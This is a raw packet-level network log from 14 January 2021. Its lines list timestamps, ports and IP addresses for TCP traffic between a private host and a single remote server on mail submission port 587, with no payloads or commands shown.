Jan 14, 2021 08:00:58.779417992 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.780541897 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.888901949 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.889091015 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.889195919 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.889422894 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.892025948 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.893903017 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.899658918 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.899729013 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.899750948 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.899944067 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.902365923 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.903110027 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.970554113 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.971345901 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.972075939 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.972248077 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.972397089 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.972543955 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.972697020 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.972846031 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.972980976 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.081841946 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.081909895 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.083683968 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.084088087 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.084784031 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.092956066 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.092982054 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.093790054 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.094099998 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.094696045 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.162086010 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.162111044 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.162199974 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.162412882 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.162452936 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.162462950 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.162585020 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.162632942 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.162655115 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.162692070 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.162772894 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.162827015 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.162867069 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.162882090 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.274780035 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.275779963 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.277128935 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.285186052 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.286075115 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.286792040 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.352428913 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.352473021 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.352499008 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.352602005 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.352646112 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.352721930 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.352754116 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.352765083 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.467076063 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.469433069 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.470249891 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.477287054 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.479733944 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.480428934 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.542547941 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.542681932 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.542762041 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.542824984 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.542867899 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.542932987 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.542967081 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.542990923 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.543087959 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.543165922 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.543236971 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.662695885 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.662748098 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.663856983 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.671436071 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.673739910 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.674511909 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.732887983 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.732935905 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.732954025 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.733216047 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.733280897 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.733724117 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.733906031 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.734091043 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.734381914 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.734672070 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.734920025 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.735168934 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.735416889 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.735667944 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.735917091 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.736171961 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.736402988 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.736644983 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.736855984 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.737072945 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.854820967 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.865669012 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.884916067 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.885723114 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.917956114 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.918556929 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:59.923295021 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.923407078 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.923523903 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.923646927 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.923779011 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.923794985 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.923913956 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.924041986 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.924169064 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.924185991 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.924315929 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.924333096 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.924496889 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.924523115 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.924633026 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.925091028 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.925235033 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.925451040 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.925776958 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.926002979 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.926198006 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.926441908 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.926572084 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.926800013 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.945501089 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:59.998678923 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.076947927 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.077280045 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.078351974 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.078640938 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.083734989 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.084335089 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.084670067 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.084933043 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.085172892 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.085433960 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.110249043 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.110939026 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.111938000 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.112185955 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.112445116 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.112723112 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.112996101 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.113265991 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.113518953 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.268318892 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.268452883 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.273644924 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.274133921 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.274982929 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.275013924 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.275206089 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.282231092 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.284898043 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.302342892 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.302373886 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.302468061 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.302596092 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.302936077 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.303013086 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.303296089 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.303390026 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.303406954 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.303503036 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.303582907 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.303685904 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.303704023 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.303781033 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.303877115 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.474869013 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.476403952 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.476424932 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.476522923 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.477168083 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.493351936 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.493467093 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.493489981 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.493582010 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.493639946 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.493642092 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.493676901 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.493822098 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.493860006 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.493880987 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.493885040 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.493930101 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.494018078 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.494076014 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.650079966 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.667733908 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.684322119 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.684345007 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.684459925 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.684492111 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.684648037 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.684662104 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.684669018 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.684716940 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.684740067 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.684755087 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.684803009 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.684817076 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.684891939 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.770239115 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.842484951 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.842526913 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.842637062 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.877116919 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.877135038 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.877141953 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.877147913 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.877155066 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.877161980 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.877172947 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.877273083 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.877377033 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.877578020 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.877696991 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.877826929 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.877932072 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.878046036 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.878130913 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.878237963 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.878335953 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.878437042 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.878532887 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.878737926 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.890619040 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.890816927 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.891074896 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.891227007 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:00.961280107 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:00.961416006 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:01.070069075 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.070101976 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.070121050 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.070139885 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.070152044 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.070271015 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.070277929 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.070333958 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.070461988 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.070523024 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.070703030 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.070719004 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.070733070 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.070749044 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.070764065 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.070779085 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.081561089 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.081585884 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.081598043 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.099317074 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.139359951 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:01.153760910 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.154012918 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:01.343703032 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.344062090 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.344387054 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:01.482537031 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:01.534154892 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.537204981 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:01.673505068 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.673712969 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:01.729152918 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.729207039 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.729243040 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.729444027 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:01.731434107 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:01.733431101 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:01.866694927 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.867805958 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:01.921303034 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.921345949 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.923052073 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.923595905 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:01.924417019 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:02.058239937 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:02.058806896 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:02.059304953 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:02.116132021 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:02.118547916 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:02.119003057 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:02.250293016 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:02.251043081 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:02.309518099 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:02.312520981 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:02.313254118 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:02.441521883 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:02.441709995 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:02.441806078 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:02.444375038 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:02.446436882 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:02.503032923 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:02.505067110 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:02.505646944 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:02.634972095 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:02.635026932 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:02.636874914 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:02.637521029 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:02.638230085 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:02.695502996 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:02.728374004 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:02.729057074 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:02.828638077 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:02.830234051 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:02.831594944 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:02.918741941 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:02.919593096 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:02.920279980 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:02.920355082 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:02.920453072 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:02.920591116 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:02.920767069 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:02.920867920 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:02.920957088 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.021953106 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.025829077 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.026349068 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.110055923 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.110099077 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.110136032 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.110157967 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.110347986 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.110399961 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.110435963 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.110526085 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.110586882 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.110620022 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.110678911 CET	49785	587	192.168.2.3	199.193.7.228
